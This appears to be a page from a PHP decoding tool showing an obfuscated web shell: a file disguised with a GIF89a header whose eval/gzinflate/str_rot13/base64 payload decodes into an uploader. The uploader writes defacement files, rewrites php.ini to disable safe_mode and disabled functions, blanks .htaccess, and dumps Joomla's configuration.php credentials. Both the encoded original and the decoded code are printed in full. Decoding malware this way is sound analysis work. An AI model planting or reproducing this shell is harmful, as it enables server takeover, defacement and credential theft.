Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a <?php eval(gzinflate(str_rot13(base64_decode('vUhEeNswEH4f7D8cIqAE0rhw9HKLWlTnlU/X..

Decoded Output download

echo '<title>^_^</title>';
echo '<center>';
echo '<blink><i>Newbie yang hilang</i></blink></br>';
echo '<i>x:'.php_uname().'</i><br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="u" id="u">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="U"></form>';
if( $_POST['_upl'] == "U" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>S</b><br><br>'; }
else { echo '<b>G</b><br><br>'; }
}
echo 'T35 v.01</br>';
echo '<b>Powered by CodeX</b><br>';
echo '<b>Made in Indonesian - Gorontalo</b>';
echo '</center>';
if(isset($_GET['x'])){
@error_reporting(E_ALL ^ E_NOTICE);
$zoneh_contents  = "hacked by palakololo";
$zoneh_file =@fopen ('$_SERVER["DOCUMENT_ROOT"]/x.txt','w');
fwrite($zoneh_file ,$zoneh_contents);
}
@error_reporting(E_ALL ^ E_NOTICE);
$zoneh_contents  = "hacked by palakololo";
$zoneh_file =@fopen ('x.txt','w');
fwrite($zoneh_file ,$zoneh_contents);
@error_reporting(E_ALL ^ E_NOTICE);
$phpini_contents  = "safe_mode = Off
safe_mode_gid = Off
safe_mode_include_dir =
safe_mode_exec_dir =
open_basedir =
disable_functions =
disable_classes =
file_uploads = On
allow_url_fopen = On";
$phpini_file =@fopen ('php.ini','w');
fwrite($phpini_file ,$phpini_contents);
@error_reporting(E_ALL ^ E_NOTICE);
$htaccess_contents  = "";
$htaccess_file =@fopen ('.htaccess','w');
fwrite($htaccess_file ,$htaccess_contents);
if(isset($_GET['x'])){
$source = "x.txt";
$gorontalo =$_SERVER['DOCUMENT_ROOT']."/x.txt";
rename($source, $gorontalo);
}
elseif(isset($_GET['joomla'])){
$codex =$_SERVER['DOCUMENT_ROOT']."/configuration.php";
$joomla = file_get_contents($codex);
echo $joomla;
}

Did this file decode correctly?

Original Code

GIF89a
<?php eval(gzinflate(str_rot13(base64_decode('vUhEeNswEH4f7D8cIqAE0rhw9HKLWlTnlU/XlCYdgzYVsi0nTXLJS2WTZ/S/QrLjzEGglD2MPFW+++7uu+8khcVYBWt5uBEsayAPcK/e4s/v37HaFzN2S9G2UYLLx2DMgyu2ijiDDZULS2Vul7HHg7G3BWtEJ4wH60JrlC9mRVeasf5ghCu4Ukx1G5mqIgMaG66kjxBxzCxI4qNcdoOAydh5ZeajrBSG57QwnsMfJdRDBC6zj1cEPGRYp77MWANoecoFeMD1XvN0uz85U8EWSztWmQu0DdJylGRGp67tQkeU1mR4gyoSSDme9qFUrifT2R1pMDwH3wcLggH8rtynsco3/R75aWQZQe+wI4DnathxOWRI8XwIB87aMbApoBlQMGi6SPpIV8OL7Uh11oacH09eGlJzH0Lgdmf8bn9DRGOtSaxgCVEbOEYJ+9kk6YC+04QBl2MhEyWZ5kfCEZyrT1ZQhdobqdc6U0kBrjUzSYHz0Iq0aX1MckFMRKiCFCxKheFl0Q/Jl8tYa4CQXFpzF3ThwAb3nnqxJYl6FZtEA0t2lzR+rNnmR9BUJewP/cU6CcE/WkjOJPRkj1nDmx/hzR36Ojm7/R5ezcjNcTJQZmI9MniDh2uFXaVnSGPD+u0kw73qDvby34j/E723ZLO3kljeJad2ylVzx2I/JnZtL2oGsuDJoZHLS5RpWmsBftvB1ixhrK4VEkTNtt8J1zQSjKSlrO67YRtwTu05qVmuP2qZFFq0Ky3vJRVPrVVMCEUL5Kyo1cyebdY6suYD/dro4b4QYkpjdnUcM627GqKOeI/RqGQcY+pTDA+TD165Uz2tyiJpRlDViak4LJp7Cf7u/OPO+cfzEfJpAQWr3uh6Lvse7RJ5z7x7dfYZ/EUqE7ShEdvZr18vdNtW+aIsqBu9+3iouNZ2LP936AtzaXr366SD5l3ZTx2jPw==')))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 0bdf9cb49de405a00ced630c2d2812c8
Eval Count 1
Decode Time 79 ms